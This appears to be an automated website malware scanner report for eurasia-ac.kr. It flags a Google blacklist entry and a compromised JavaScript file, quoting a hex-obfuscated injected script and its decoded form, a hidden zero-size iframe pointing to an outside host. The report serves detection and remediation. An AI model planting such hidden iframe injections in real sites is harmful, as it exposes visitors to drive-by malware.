Malware Scanner report for eurasia-ac.kr

Malicious/Suspicious/Total URLs checked
0/1/15
1 page has suspicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "eurasia-ac.kr" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/1
Deface / Content modification
OK

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=eurasia-ac.kr

Result: The website is marked by Google as suspicious - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request / Server response / Status
http://eurasia-ac.kr/
200 OK
Content-Length: 43363
Content-Type: text/html
clean
http://eurasia-ac.kr/inc/okplugin_js.js
200 OK
Content-Length: 925
Content-Type: application/javascript
suspicious
Suspicious code. Script contains iFrame.

function PrintEmbed(EmbID)
{
document.write(document.getElementById(EmbID).value);
}
var _$=["\x64\x6f\x63\x75\x6d\x65\x6e\x74","\x63\x6f\x6f\x6b\x69\x65","\x69\x6e\x64\x65\x78\x4f\x66",'\x6c\x6f\x6e\x67\x3d',"\x73\x65\x74\x54\x69\x6d\x65","\x67\x65\x74\x54\x69\x6d\x65",'\x6c\x6f\x6e\x67\x3d\x59\x65\x73\x3b\x70\x61\x74\x68\x3d\x2f\x3b\x65\x78\x70\x69\x72\x65\x73\x3d',"\x74\x6f\x47\x4d\x54\x53\x74\x72\x69\x6e\x67","\x77\x72\x
...[489 bytes skipped]...

Decoded script:


<iframe src=http://meehospital.com/swf/index.html width=0 height=0></iframe>

http://eurasia-ac.kr/js/common.js
200 OK
Content-Length: 5375
Content-Type: application/javascript
clean
http://eurasia-ac.kr/js/common_ro.js
200 OK
Content-Length: 34593
Content-Type: application/javascript
clean
http://eurasia-ac.kr/js/popup.js
200 OK
Content-Length: 4165
Content-Type: application/javascript
clean
http://eurasia-ac.kr/js/object_embed.js
200 OK
Content-Length: 3243
Content-Type: application/javascript
clean
http://eurasia-ac.kr/js/flash.js
200 OK
Content-Length: 2955
Content-Type: application/javascript
clean
http://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js
200 OK
Content-Length: 91556
Content-Type: text/javascript
clean
http://eurasia-ac.kr/login/login.php
200 OK
Content-Length: 20819
Content-Type: text/html
clean
http://eurasia-ac.kr/login/
403 Forbidden
Content-Length: 204
Content-Type: text/html
clean
http://eurasia-ac.kr/test404page.js
404 Not Found
Content-Length: 208
Content-Type: text/html
clean
http://eurasia-ac.kr/member/join_step1.php
200 OK
Content-Length: 47454
Content-Type: text/html
clean
http://secure.nuguya.com/nuguya/nice.nuguya.oivs.crypto.js
200 OK
Content-Length: 25258
Content-Type: application/x-javascript
clean
http://secure.nuguya.com/nuguya/nice.nuguya.oivs.msg.js
200 OK
Content-Length: 9559
Content-Type: application/x-javascript
clean
http://secure.nuguya.com/nuguya/nice.nuguya.oivs.util.js
200 OK
Content-Length: 14963
Content-Type: application/x-javascript
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: eurasia-ac.kr

Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Mon, 12 Jan 2015 06:52:34 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=euc-kr
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: CP="NOI CURa ADMa DEVa TAIa OUR DELa BUS IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: PHPSESSID=ch1ilm0oefom5pgjr9j2bp6ct1; path=/
Set-Cookie: eurasia-ac_kr-recommend=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT
X-Powered-By: PHP/5.3.13p1

Second query (visit from search engine):
GET / HTTP/1.1
Host: eurasia-ac.kr
Referer: http://www.google.com/search?q=eurasia-ac.kr

Result:
The result is similar to the first query. There are no suspicious redirects found.